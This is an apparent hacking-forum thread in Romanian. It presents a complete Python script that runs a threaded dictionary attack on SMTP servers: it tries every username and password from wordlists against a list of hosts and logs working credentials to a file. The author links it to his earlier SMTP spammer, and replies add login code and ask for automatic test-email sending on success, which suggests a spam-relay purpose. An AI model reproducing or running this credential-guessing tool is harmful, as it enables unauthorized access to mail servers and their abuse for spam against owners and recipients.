Jump to content
cmiN

[Python] SMTP Dictionary Attack [cmiN]

By cmiN, in Programare

Recommended Posts

cmiN Newbie

cmiN

Posted
Posted

Postasem cu ceva vreme in urma un smtp spammer si un pop3 checker acum am facut si un brute pe liste care testeaza asincron smtp-uri generate / gasite de voi.

Este scris cu simt de raspundere si cu cap nu ca restul vrajelilor care le-am vazut pe net. E destul de optim, nu va lua niciodata un host, user sau pass de 2 ori si nici nu va mai continua sa scaneze un smtp aiurea din moment ce i-a gasit o combinatie de user+pass care sa mearga. Testati-l pe smtp-uri care cer logare cu user sau pass acum depinde si de felul lui de a manevra situatiile (la esmtp mai face faze depinde cum primeste el ehlo si helo si cum reactioneaza la ele). Nu l-am facut compatibil si ssl era prea multa bataie de cap. E un dictionary attacker si nu un brute forcer, fiindca toate detaliile le preia de la user, el nu genereaza nimic. Cu generat mai sunt o sumedenie pe net si ia o tona de timp ... asa daca aveti chef faceti rapid cu un simplu backtracking niste liste de ipuri si cateva de usere si passuri.

[ATENTIE]

Ataca in felul urmator: pentru fiecare user, pentru fiecare pass, pentru fiecare smtp ramas in lista de scanat se incearca combinatia respectiva.

Python code by cmiN - 77 lines - codepad

Python 3.2

#! /usr/bin/env python3.2
# SMTP Dictionary Attack
# 21.03.2011 cmiN

from smtplib import SMTP
from sys import argv
import threading

def usage():
    print("\tUsage: source.ext <hosts> <users> <words> <threads> [timeout]")
    print("Note that hosts, users and words are text files with <EOL> separated strings.")
    print("Threads is an integer.")
    print("Timeout is a float in seconds and is optional.")
    print("Example: smda.py hosts.txt C:\\users.txt /tmp/words.txt 10 1")

def fill_vec(name, vec):
    count = 0
    with open(name, "rt") as fin:
        for x in fin:
            y = x.strip()
            if not y in vec:
                vec.add(y)
                count += 1
    return count

class SDA(threading.Thread):
    hvec = None
    timeout = None
    count = 0
    fobj = None
    def __init__(self, user, word):
        threading.Thread.__init__(self)
        self.user = user
        self.word = word
    def run(self):
        for host in list(SDA.hvec):
            try:
                server = SMTP(host, timeout=SDA.timeout)
                server.login(self.user, self.word)
                server.quit()
                if host in SDA.hvec:
                    SDA.hvec.remove(host)
                    string = "%s %s %s\n" % (host, self.user, self.word)
                    SDA.fobj.write(string)
                    SDA.fobj.flush()
                    SDA.count += 1
            except:
                pass

def process(hosts, users, words, threads, timeout=None):
    hvec, uvec, wvec = set(), set(), set()
    comp = fill_vec(hosts, hvec) * ((fill_vec(users, uvec) * fill_vec(words, wvec)) / threads)
    print("Processing %d requests per thread. Please wait..." % comp)
    SDA.hvec = hvec
    SDA.timeout = timeout
    SDA.fobj = open("working.txt", "at")
    for user in uvec:
        for word in wvec:
            while threading.active_count() > threads:
                pass
            SDA(user, word).start()
    while threading.active_count() > 1:
        pass
    SDA.fobj.write("=" * 50 + "\n")
    SDA.fobj.close()
    print("Finished! Were found %d working SMTPs (see 'working.txt')." % SDA.count)

def main():
    if len(argv) == 6:
        process(argv[1], argv[2], argv[3], int(argv[4]), float(argv[5]))
    elif len(argv) == 5:
        process(argv[1], argv[2], argv[3], int(argv[4]))
    else:
        usage()

if __name__ == "__main__":
    main()

EDIT: 25.03.2011

  • Upvote 2
  • Downvote 1
Link to comment
Share on other sites
Guest

Guest

Posted
Posted

chiar cautam unul. iar referitor la problema ta uite cum am rezolvat eu problema in sender-ul meu

session = smtplib.SMTP(pula, "25")

session.ehlo

session.login(pula1, pula2)

asta e pe logare simpla, iar pe ssl:

session = smtplib.SMTP(pula, "25")

session.ehlo()

session.starttls()

session.ehlo

session.login(pula1, pula2)

Link to comment
Share on other sites
Guest

Guest

Posted
Posted
Nu prea ai inteles. Vroiam atunci cand gaseste o combinatie buna (ip user pass) sa trimita un email catre un email predefinit cu mesajul extern gen test.html etc. Sa fie implementata asta in acest tool.

problema de auth si ehlo nu de send

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...